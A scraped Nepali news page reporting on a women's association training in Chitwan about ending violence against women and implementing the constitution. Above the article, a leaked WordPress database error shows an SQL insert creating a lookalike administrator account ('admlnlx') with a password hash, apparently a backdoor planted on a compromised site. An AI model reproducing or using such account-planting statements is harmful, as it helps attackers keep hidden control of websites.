WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0ML4Fls72uEkxKYcIdtpHkuZMANRK.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 18:31:29', '', 'admlnlx', 'admlnlx')
चितवन, मंसिर २८–
अखिल नेपाल महिला संघ जिल्ला समिति चितवनले महिला माथि भएका सवै प्रकारका हिंसाको अन्त्य गरौं जनताबाट निर्वाचित ९० प्रतिशत जनप्रतिनिधीले बनाएको संविधान कार्यान्वयन गरौं भन्ने बिषयमा एमाले पार्टी कार्यालय भरतपुरमा एक दिने प्रशिक्षण कार्यक्रम आज सम्पन्न गरेको छ ।
संविधान कार्यान्वयनकाका लागी जनपरिचालन अभियान अन्र्तगत संघले जिल्लाका सवै क्षेत्रमा प्रशिक्षण कार्यक्रम आयोजना गरेको छ । सोही अनुरुप आज जिल्लास्तरीय प्रशिक्षण कार्यक्रम गरिएको जिल्ला अध्यक्ष सरस्वती बिष्टले जानकारी दिनुभयो । अनेमसंघ केन्द्रिय सदस्य प्रभा वरालको प्रमुख आतिथ्यतामा भएको कार्यक्रममा प्रशिक्षका रुपमा अनेमसंघ केन्द्रिय सदस्य शारदा कुमाल, एमाले चितवनकी जिल्ला सचिव पार्वती रावल, अनेमसंघ प्रदेश कमिटि सदस्य डा. शारदा भट्टराई रहनुभएको थियो । संघले क्षेत्र नः १ मा पौष ४ गते, क्षेत्र नः २ मा पौडा ९ गते, क्षेत्र नः ३ मा पौष २ गते, क्षेत्र नः ४ मा पौष १० गते र क्षेत्र नः ५ मा पौष १० गते प्रशिक्षण कार्यक्रम राखिएको संघकी जिल्ला सचिव कल्पना सापकोटाले जानकारी दिनुभयो ।